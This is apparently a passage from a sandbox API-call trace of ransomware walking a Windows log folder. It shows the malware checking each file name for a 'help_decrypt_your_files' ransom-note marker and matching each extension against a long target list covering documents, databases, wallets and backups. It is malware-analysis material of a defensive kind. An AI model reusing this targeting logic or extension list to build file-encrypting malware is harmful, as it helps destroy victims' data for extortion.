	[0179.211] lstrcmpW (lpString1="UpdateSessionOrchestration.014.etl", lpString2=".") returned 1
	[0179.211] lstrcpyW (in: lpString1=0x18bdf4, lpString2="C:\\Users\\All Users\\USOShared\\Logs\\" | out: lpString1="C:\\Users\\All Users\\USOShared\\Logs\\") returned="C:\\Users\\All Users\\USOShared\\Logs\\"
	[0179.212] lstrcatW (in: lpString1="C:\\Users\\All Users\\USOShared\\Logs\\", lpString2="UpdateSessionOrchestration.014.etl" | out: lpString1="C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.014.etl") returned="C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.014.etl"
	[0179.212] lstrlenW (lpString="C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.014.etl") returned 68
	[0179.212] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0179.212] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.014.etl", cchLength=0x44 | out: lpsz="c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.014.etl") returned 0x44
	[0179.212] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.212] StrStrW (lpFirst="c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.014.etl", lpSrch="help_decrypt_your_files") returned 0x0
	[0179.212] lstrcpyW (in: lpString1=0x18b99c, lpString2="c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.014.etl" | out: lpString1="c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.014.etl") returned="c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.014.etl"
	[0179.212] lstrlenW (lpString="c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.014.etl") returned 68
	[0179.212] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0179.213] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.213] StrStrW (lpFirst=".etl", lpSrch=".") returned=".etl"
	[0179.213] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.213] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".etl") returned 0x0
	[0179.213] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf97592c3, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0x4e8a793e, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4e8a793e, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x0, dwReserved1=0x0, cFileName="UpdateSessionOrchestration.015.etl", cAlternateFileName="UPDATE~2.ETL")) returned 1
	[0179.213] lstrcmpW (lpString1="UpdateSessionOrchestration.015.etl", lpString2="..") returned 1
	[0179.213] lstrcmpW (lpString1="UpdateSessionOrchestration.015.etl", lpString2=".") returned 1
	[0179.214] lstrcpyW (in: lpString1=0x18bdf4, lpString2="C:\\Users\\All Users\\USOShared\\Logs\\" | out: lpString1="C:\\Users\\All Users\\USOShared\\Logs\\") returned="C:\\Users\\All Users\\USOShared\\Logs\\"
	[0179.214] lstrcatW (in: lpString1="C:\\Users\\All Users\\USOShared\\Logs\\", lpString2="UpdateSessionOrchestration.015.etl" | out: lpString1="C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.015.etl") returned="C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.015.etl"
	[0179.214] lstrlenW (lpString="C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.015.etl") returned 68
	[0179.214] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0179.214] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.015.etl", cchLength=0x44 | out: lpsz="c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.015.etl") returned 0x44
	[0179.214] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.214] StrStrW (lpFirst="c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.015.etl", lpSrch="help_decrypt_your_files") returned 0x0
	[0179.214] lstrcpyW (in: lpString1=0x18b99c, lpString2="c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.015.etl" | out: lpString1="c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.015.etl") returned="c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.015.etl"
	[0179.214] lstrlenW (lpString="c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.015.etl") returned 68
	[0179.215] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0179.215] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.215] StrStrW (lpFirst=".etl", lpSrch=".") returned=".etl"
	[0179.215] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.215] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".etl") returned 0x0
	[0179.215] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf97592c3, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf97592c3, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0x1d9a4c7e, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="UpdateSessionOrchestration.016.etl", cAlternateFileName="UPDATE~1.ETL")) returned 1
	[0179.216] lstrcmpW (lpString1="UpdateSessionOrchestration.016.etl", lpString2="..") returned 1
	[0179.216] lstrcmpW (lpString1="UpdateSessionOrchestration.016.etl", lpString2=".") returned 1
	[0179.216] lstrcpyW (in: lpString1=0x18bdf4, lpString2="C:\\Users\\All Users\\USOShared\\Logs\\" | out: lpString1="C:\\Users\\All Users\\USOShared\\Logs\\") returned="C:\\Users\\All Users\\USOShared\\Logs\\"
	[0179.216] lstrcatW (in: lpString1="C:\\Users\\All Users\\USOShared\\Logs\\", lpString2="UpdateSessionOrchestration.016.etl" | out: lpString1="C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.016.etl") returned="C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.016.etl"
	[0179.216] lstrlenW (lpString="C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.016.etl") returned 68
	[0179.216] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0179.216] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.016.etl", cchLength=0x44 | out: lpsz="c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.016.etl") returned 0x44
	[0179.216] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.217] StrStrW (lpFirst="c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.016.etl", lpSrch="help_decrypt_your_files") returned 0x0
	[0179.217] lstrcpyW (in: lpString1=0x18b99c, lpString2="c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.016.etl" | out: lpString1="c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.016.etl") returned="c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.016.etl"
	[0179.217] lstrlenW (lpString="c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.016.etl") returned 68
	[0179.217] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0179.217] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.217] StrStrW (lpFirst=".etl", lpSrch=".") returned=".etl"
	[0179.217] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.218] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.p